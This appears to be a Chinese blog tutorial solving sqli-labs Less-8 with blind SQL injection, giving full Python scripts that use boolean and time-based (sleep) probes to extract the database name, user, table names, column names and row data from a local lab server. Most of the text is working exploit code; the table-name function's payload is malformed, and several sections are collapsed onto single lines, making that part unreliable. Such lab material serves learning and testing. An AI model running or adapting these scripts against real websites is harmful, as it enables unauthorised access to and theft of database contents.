
sql盲注脚本

sql盲注脚本
sqli-labs 中的第 8 题没有回显，可以尝试用盲注的手法获取数据。

发现页面加载了 3 秒左右，说明可以进行盲注。

布尔盲注数据库名

import requests


def inject_database(url):
    """Read the current database name from sqli-labs Less-8 through a boolean oracle.

    Lab-only script: ``url`` is the local sqli-labs endpoint assigned in
    ``__main__``.  Each character is located by binary search over ASCII
    32..127; the oracle is whether the response body still contains the
    string "You are in..........." after the injected comparison.  At most
    14 characters are read (``range(1, 15)``).  The long run of
    ``ascii(substr(...))`` probes against one endpoint is the request
    pattern that blind-injection detection rules in web logs key on.

    Args:
        url: Base URL of the vulnerable page; the query string built below
            is appended to it by ``requests``.

    Returns:
        None.  The partial name is printed after every character.
    """
    dataname = ''
    for i in range(1, 15):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # Raw query string, passed positionally as the ``params`` argument.
            path = "id=1' and ascii(substr(database(),%d, 1)) > %d-- " % (i, mid)
            r = requests.get(url, path)
            if "You are in..........." in r.text:
                low = mid + 1  # character code is greater than mid
            else:
                high = mid
            mid = (low + high) // 2
        # A space (ASCII 32) is treated as the end of the name.
        if mid == 32:
            break
        dataname += chr(mid)
        print(dataname)


if __name__ == '__main__':
    url = 'http://127.0.0.1:8989/Less-8/'
    inject_database(url)

结果

用时间盲注出用户名

import requests
import time


def inject_user(url):
    """Read the database user name from sqli-labs Less-8 through a time oracle.

    Same binary search as the boolean variant, but the oracle is response
    time: the injected ``if(..., sleep(1), 0)`` delays the reply when the
    character code is greater than ``mid``, and a round trip longer than one
    second is taken as "true".  Each true branch therefore costs at least one
    second, and network jitter near the 1 s threshold can flip a decision.
    At most 14 characters are read (``range(1, 15)``).

    Args:
        url: Base URL of the vulnerable page; the payload is sent as the
            ``id`` query parameter.

    Returns:
        None.  The partial user name is printed after every character.
    """
    user = ''
    for i in range(1, 15):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = f"1' and if(ascii(substr(user(), {i}, 1)) > {mid},sleep(1),0)-- "
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            if (time.time() - start_time) > 1:  # delayed reply: comparison was true
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # A space (ASCII 32) is treated as the end of the name.
        if mid == 32:
            break
        user += chr(mid)
        print(user)


if __name__ == '__main__':
    url = 'http://127.0.0.1:8989/Less-8/'
    inject_user(url)

结果

用盲注的方式查询表、列、具体数据

if __name__ == '__main__': url = 'http://127.0.0.1:8989/Less-8/' # 获取当前数据库名 database_name = inject_database(url) print(f"Database name: {database_name}") # 获取数据库中的表名 tables = inject_tables(url, database_name) print(f"Tables in database '{database_name}': {tables}") # 获取指定表中的列名 table_name = 'users' # 替换为目标表名 columns = inject_columns(url, table_name) print(f"Columns in table '{table_name}': {columns}") # 获取指定表中特定列的数据 column_name = 'username' # 替换为目标列名 data = inject_data(url, table_name, column_name) print(f"Data in column '{column_name}' of table '{table_name}': {data}")

时间检测模块

# 发送请求并检查响应时间 def check_time_injection(url, payload): res = {"id": payload} start_time = time.time() r = requests.get(url, params=res) elapsed_time = time.time() - start_time return elapsed_time > 1 # 假设延迟超过1秒表示查询成功

数据库模块

# 获取当前数据库名 def inject_database(url): dataname='' for i in range(1,15): low = 32 high = 128 mid = (low + high) // 2 while low < high: payload = "1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid) res = {"id":payload} r = requests.get(url,params=res) if "You are in..........." in r.text: low = mid + 1 else : high = mid mid = (low + high) // 2 if mid == 32: break dataname += chr(mid) print(dataname) return dataname

数据库中表名模块

# 获取指定数据库中的表名 def inject_tables(url, database_name): tables = [] table_index = 0 while True: table_index += 1 table_name = '' for i in range(1, 20): # 假设表名长度不超过20字符 low = 32 high = 128 while low < high: mid = (low + high) // 2 payload = f",' and if(ascii(substr(select table_name from information_schema.tables where table_name='{database_name}' limit {table_index-1},1),{i},1 > {mid},sleep(1),0)-- " if check_time_injection(url, payload): low = mid + 1 else: high = mid if low == 32: # ASCII码32为空格,通常表示结束 break table_name += chr(low) print(f"Current table name: {table_name}") if table_name: tables.append(table_name) print(f"Found table: {table_name}") else: break return tables

列名模块

# Fetch the column names of the given table.
def inject_columns(url, table_name):
    """Return column names of ``table_name`` from information_schema.columns.

    Rows are walked with ``limit {column_index-1},1``; the outer loop stops
    at the first row whose recovered name is empty.  Each name is read
    character by character with check_time_injection's time oracle, at
    most 19 characters (``range(1, 20)``), stopping early at ASCII 32.
    Every true probe costs at least one second because of ``sleep(1)``.

    Args:
        url: Base URL of the vulnerable page.
        table_name: Value interpolated directly into the query text.

    Returns:
        list[str]: Recovered column names, in the order the rows were read.
    """
    columns = []
    column_index = 0
    while True:
        column_index += 1
        column_name = ''
        for i in range(1, 20):  # assumes names are at most 20 characters (19 positions are read)
            low = 32
            high = 128
            while low < high:
                mid = (low + high) // 2
                payload = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {column_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
                if check_time_injection(url, payload):
                    low = mid + 1
                else:
                    high = mid
            if low == 32:  # ASCII 32 is a space, taken to mean the end of the name
                break
            column_name += chr(low)
            print(f"Current column name: {column_name}")
        if column_name:
            columns.append(column_name)
            print(f"Found column: {column_name}")
        else:
            break  # an empty name means no more rows
    return columns

指定查询数据模块

# 获取指定表中特定列的数据 def inject_data(url, table_name, column_name): data = [] row_index = 0 while True: row_index += 1 row_value = '' for i in range(1, 20): # 假设数据长度不超过20字符 low = 32 high = 128 while low < high: mid = (low + high) // 2 payload = f"1' and if(ascii(substr((select {column_name} from {table_name} limit {row_index-1},1),{i},1)) > {mid},sleep(1),0) -- " if check_time_injection(url, payload): low = mid + 1 else: high = mid if low == 32: # ASCII码32为空格,通常表示结束 break row_value += chr(low) print(f"Current row value: {row_value}") if row_value: data.append(row_value) print(f"Found data: {row_value}") else: break return data

结果

数据库

user

